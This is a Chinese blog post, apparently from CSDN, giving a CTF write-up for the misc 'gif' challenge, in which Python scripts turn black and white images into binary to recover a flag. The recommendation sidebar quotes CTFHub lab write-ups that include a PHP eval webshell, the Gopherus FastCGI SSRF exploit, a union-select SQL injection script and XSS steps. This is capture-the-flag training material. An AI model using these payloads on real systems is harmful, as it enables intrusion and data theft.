gif的writeup

最新推荐文章于 2024-02-28 16:47:57 发布
原创 最新推荐文章于 2024-02-28 16:47:57 发布 · 716 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

    大家好,这次为大家带来的是攻防世界misc部分gif的writeup。
    先下载附件,是一个压缩包。二话不说,先解压。打开解压后的文件夹后,发现又有两个文件夹,打开第一个文件夹,里面只有一张损坏的图片,看起来没什么价值。打开第二个文件夹,里面是一堆或黑或白的图片,自然而然想到可能黑图和白图对应二进制码中的1和0。

在这里插入图片描述

    因为直接手动转换太慢,所以,我用python写了一个将其转换为二进制的脚本。

path = input("输入图片所在文件夹")
img0 = open(path + "\\" + "0.jpg", "rb")
img0 = img0.read()
out = ""
i = 0
while i <= 103:
    img = open(path + "\\" + str(i) + ".jpg", "rb")
    img = img.read()
    if img == img0:
        out += "0"
    else:
        out += "1"
    i += 1
f = open(path + "\\" + "result.txt", "w")
f.write(out)

    运行之后得到二进制码:01100110011011000110000101100111011110110100011001110101010011100101111101100111011010010100011001111101。
    还是那句话,手动转码太慢,上代码。

path = input("输入写字本所在文件夹")
f = open(path + "\\" + "result.txt", "r")
strings = f.read().rstrip()
i = 0
s = ""
out = ""
while i <= len(strings) - 1:
    s += strings[i]
    if i % 8 == 7:
        out += chr(int(s, 2))
        s = ""
    i += 1
f = open(path + "\\" + "result.txt", "w")
f.write(out)

    运行之后得到flag:FuN_giF。

攻防世界_MISC_新手区——“gif
Ho1aAs‘s Blog
07-26 955
文章目录使用工具解题过程完 –>攻防世界传送门<– 使用工具 WINRAR Adobe Photoshop StegSolve WinHex 解题过程 附件是一个损坏的压缩包,打开提示内含文件头损坏 使用WinHex查询文件头缺失位置 secret.png是压缩文件的内含文件,文件头应改成74 解压,得到png图像,然而ps却提示文件后缀错误 再次使用WinHex查询文件类型,修改成GIFGIF文件为全空白,flag应该藏在某个颜色通道内,总共有两张图,分离提取 使用Steg
【攻防世界CTF|misc方向】第五题:gif
weixin_70825534的博客
08-08 975
(因为我们想要得到的flag属于字符串类型,所以我们大胆猜测,把这串二进制信息里包含的就是我们想要的flag,所以把它转成字符串)我的第一反应是自己手动转化:打开我们的记事本,对着文件夹内图片顺序,按着白色是0,黑色是1的规则,把104张图片转成二进制。观察第一张和第二张图片发现0.jpg是白色的,1.jpg是黑色的,于是我们大胆猜测白色图片代表0,黑色图片代表1。全都是黑色和白色的图片,很容易让我们联想到二进制表达0和1。ok,全部转换过来了,现在我们把他们凑在一起,方便后期转码。
XCTF-攻防世界 MISC-gif 题解
YUK_103的博客
09-11 3505
下载附件后得到: 一堆黑白色块0到103一共104张,且104可以整除8.显然我们需要把黑白转换成0和1,两种方法:1)手动输入。但是能用编程解决的问题为什么要去手动解决呢???所以2)写py多爽!!!代码附上: from PIL import Image path = '文件的路径' ch = '.jpg'//还好是这种有规律的可以这样拼凑 for i in range(104): s...
攻防世界Misc入门题之gif
沐一 · 林 的博客
08-13 3038
攻防世界Misc入门题之gif 继续开启全栈梦想之逆向之旅~ 这题是攻防世界Misc入门题之gif 下载来个压缩包,解压,两个文件夹,由于题目提示gif图,所以奔着gif图去看: 这个gif我在windows打不开,习惯性地扔如winhex64看一下: mac头,直接把我吓跑,我可没有macos系统,于是打开另一个文件夹,都是图片,因为图片太多,所以肯定是批量分析,绝对不可能一个图片一个图片查,关键是我不明白怎么批量分析: 查了查资料,说是只有黑白的话就是01中选,想想也是,毕竟黑白与01都是对立面,
【攻防世界】七、gif
Hi~ 土拨鼠
10-19 1319
步骤 下载所给附件,发现是一个压缩包,解压之后发现两个文件夹,分别为: 其中_MACOSX文件夹中有一个图片,但是打不开 使用winhex工具查看,根据头文件发现不是jpg图片gif文件夹中发现104张图片,都可以正常打开。使用winhex随便打开一张图片进行分析,发现确实是jpg 根据分析,图片有104张(0-103)为8的倍数,而且只有黑白两种颜色,可能是二进制 我们先让白色为0,黑色为1,得出一串二进制字符串 使用python脚本帮助我们进行转换: white = open(r"C:.
精选资源
2022强国杯writeup
07-17
2022强国杯writeup CTF(Capture The Flag)是一种网络安全比赛形式,旨在测试参与者的网络攻击和防御能力。在这场强国杯比赛中,我们将对misc、crypto和web三个方向的题目进行分析和解释。 MiscMisc分类中,...
BUUCTF-WriteUp
鱼的博客
02-01 930
title: BUUCTF WriteUp date: 2021-01-16 17:44:59 tags: CTF WriteUP WEB [HCTF 2018]WarmUp 启动环境,打开网址是一张滑稽,没什么用,看一下源码,发现有注释。 访问source.php,直接给了源码,进行代码审计。 分两块,第一块是emmm::checkFile,里面做了一些判断。 第二块是一个include,文件包含,我们要绕过验证,也就是上面的checkFile方法。 hint.php include触发的三个判断.
whaleCTF MISC_Writeup(姿势大全)
Pad0y的博客
04-21 2719
这两天抽空把whaleCTF的MISC部分的题目整理了下,比较基础,writeup写得简陋了些,如有错误欢迎各位师傅指正,持续更新 Find 直接上stegsolve神器,会发现一张反色的二维码,保存下来再反色即可,得到flag flag{hctf_3xF$235#\x5e3} 被我吃了 winhex下可以看到图片包含了一个zip,分离至新文件保存为zip即可得到flag flag{Welcome...
DMCTF部分题目writeup
qq_51429131的博客
11-29 1693
DMCTF部分题目writeup 文章目录DMCTF部分题目writeup一、Reverse二、Web三、Crypto四、MiscE·N·D 首先说明本蒟蒻是大一菜鸡,刚刚入门CTF,啥也不会,就凭着Google硬搜硬写,混了些许分数 大部分题都能在网上找到类似的题目或者相应的轮子,跟着先辈们一步一步就能混到些许分数 这些writeup是我个人的写法,如果有更好的更绝妙的写法请大佬手下留情,希望大佬们不吝赐教|・ω・`) 一、Reverse 就做了一道题,我太菜了,真的还有写wp的必要么(悲) _(:з」∠
2022网鼎杯网络安全大赛白虎组部分Writeup
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
09-06 5108
2022网鼎杯网络安全大赛白虎组部分Writeup
CTF MISC安全杂项经典例题讲解
10-22
该内容为CTF赛题MISC安全杂项经理例题讲解,包含图片隐写,流量分析,web安全等多种题型讲解,图文结合,适合新手学习。
攻防世界 Misc——gif
XYZCG的博客
11-26 1055
刷题时遇到的好题动态图?打开附件后,打开第一个文件夹,用010 Editor查看,发现MacOs、apple字样,也许跟mac系统有关?打开第二个名为gif的文件夹,发现里面有共104张.jpg的图片,且打开非黑即白,而且排序是从0开始的,外加0是白,1是黑,是不是在暗示什么?代码中也是0代表无,1代表有。是不是想到了什么?去试试。
攻防世界MISC新手区-gif
零安道长的博客
06-25 586
题目描述: 菜狗截获了一张菜鸡发给菜猫的动态图,却发现另有玄机 1.下载下来是一个压缩包,解压后有一个名为gif的文件夹 2.发现是一堆纯黑图片和纯白图片,联想到二进制,黑色为1,白色为0,使用py脚本,得出这样一串二进制 3.然后找一个在线二进制转字符串网站,得到flag{FuN_giF},本题完成 附件 ...
攻防世界,Miscgif
Pai_Space
11-27 498
1.解题过程: 获得一组图,一百多张,要么黑要么白,有可能可以组合成字母数字,但我们不知道缩放大小,再多看一会会想到是否是摩尔斯密码,接着想到计算机导论中学的点阵图的二进制编码,黑为1,白为0 对照输入转换得到 16 进制文本 将 16 进制转换为文本,得到 flag ...
Misc——图片隐写
qq_47804678的博客
12-20 4577
图片使用WinHex打开,搜索“flag”(ASCII编码),发现有flag的base4编码,解密得到flag。
攻防世界-MISC-练习区-07(gif
qq_61993117的博客
11-28 277
题目描述:菜狗截获了一张菜鸡发给菜猫的动态图,却发现另有玄机 打开附件1,发现里面是黑色和白色的图片,然后思考了一下用二进制,然后白色图片代表0,黑色图片代表1 然后得到:01100110011011000110000101100111011110110100011001110101010011100101111101100111011010010100011001111101 然后考虑用二进制转换成字符串得到flag ...
攻防世界misc新手之gif
qq_40481505的博客
05-11 5949
下载附件并解压,发现是一堆黑色和白色的图片,按某种规律排列,猜想flag就应该隐藏在黑白图片的排列顺序里 黑、白两种图片应该有对应的含义,我首先想到的是摩斯电码,黑白对应‘.’和‘-’,但分析之后发现这个猜想不可行,一是没有分隔符,二是摩斯电码里面并不包含‘{’和‘}’ 然后又联想到黑白两种状态可能对应二进制的‘0’和‘1’,而这些黑白图片的顺序可以改写成一串二进制序列,然后发现图片总数为104,...
攻防世界misc中的gif解题脚本
my_name_is_sy的博客
11-22 730
这一题我找了好久都没找到想要的脚本,于是我决定解放我的copy、past技能。 解题思路: 根据黑白两种图像的sha1值不同区分文件 将第一个图片视为1,另一个视为0 。拼接成10字符串 …… 废话不多说,直接上代码: # -*- coding:utf-8 -*- import hashlib def JMSHA1(path): sha1jiami = hashlib.sha1() try : a = open(fr'{path}','rb') except:
Mysterious-GIF-攻防世界-MISC
苏生要努力
02-28 1714
下载得到gif文件,十六进制编辑器查看,发现末尾有50 4B 03 04文件头。提取后保存为zip文件。解压该zip文件,得到temp.zip。十六进制编辑器查看temp.zip,会发现有多个文件头和文件尾。用binwalk分离temp.zip,得到了partaa.enc到partke.enc共265个文件。
writeup
最新发布
09-26
以下是部分 CTFHub web 基础教程的 writeup: - **信息泄漏**: ```bash # 安装 dirsearch 包 sudo apt-get install dirsearch # 目录扫描,-u 用于指定要扫描的 URL sudo dirsearch -u "http://challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/" # 进入相关目录 ls cd site ls cd challenge-74ace4f302db1181.sandbox.ctfhub.com:10800/ ls # 扫描程序获取当前 Git 仓库的提交历史信息 git log # 在 Git 中配置一个名为 safe.directory 的全局设置,指定安全目录 git config --global --add safe.directory /home/kali/Desktop/GitHack/site/challenge-74ace4f302db1181.sandbox.ctfhub.com:10800 ls git log ``` - **SSRF 通关攻略之 FastCGI 协议**: ```bash # 在 kali 里下载 gopherus 工具并解压 git clone https://github.com/tarunkant/Gopherus.git # 在文件里打开终端,执行命令 python2 gopherus.py --exploit fastcgi ``` 判断文件是否存在,通过访问不同文件观察返回信息: ```bash # 尝试访问首页文件 访问首页文件 index.php # 访问不存在的文件 输入 wjf.php 显示 404,说明 index.php 存在 ``` 注入木马及编码操作: ```bash # 一句话木马 <?php @eval($_POST['cmd']);?> # base64 编码 PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= # 解码并保存为 shell.php echo "PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=" | base64 -d > shell.php ``` 连接木马: ```bash # 打开蚁剑,右键添加数据,添加木马文件 http://challenge-641b288f17028a60.sandbox.ctfhub.com:10800/wjf123.php ``` - **SQL 注入**: ```python import requests def mySQL(payload): url = 'http://challenge-196392c6b0acebd8.sandbox.ctfhub.com:10800/' header = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "Cookie": "id=-1 " + payload + "; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F", } r = requests.get(url, headers=header) return r.text print(mySQL("union select 1,group_concat(schema_name)from information_schema.schemata")) print(mySQL("union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'")) print(mySQL("union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='srdnlrlphq'")) print(mySQL("union select 1,group_concat(icehhmfjxt) from sqli.srdnlrlphq")) ``` - **XSS**:分析完后利用前面的 XSS 网站生成 XSS 攻击代码。注册完进入页面,点击“我的项目”后面的“创建”,选择默认配置,拉到最下面点击“下一步”,将生成的代码拼接到原题目网址后面的 `?name=` 后面,再输入到第二个框内,点击“send”。成功后回到 XSS 网站点击项目内容查看记录[^3]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值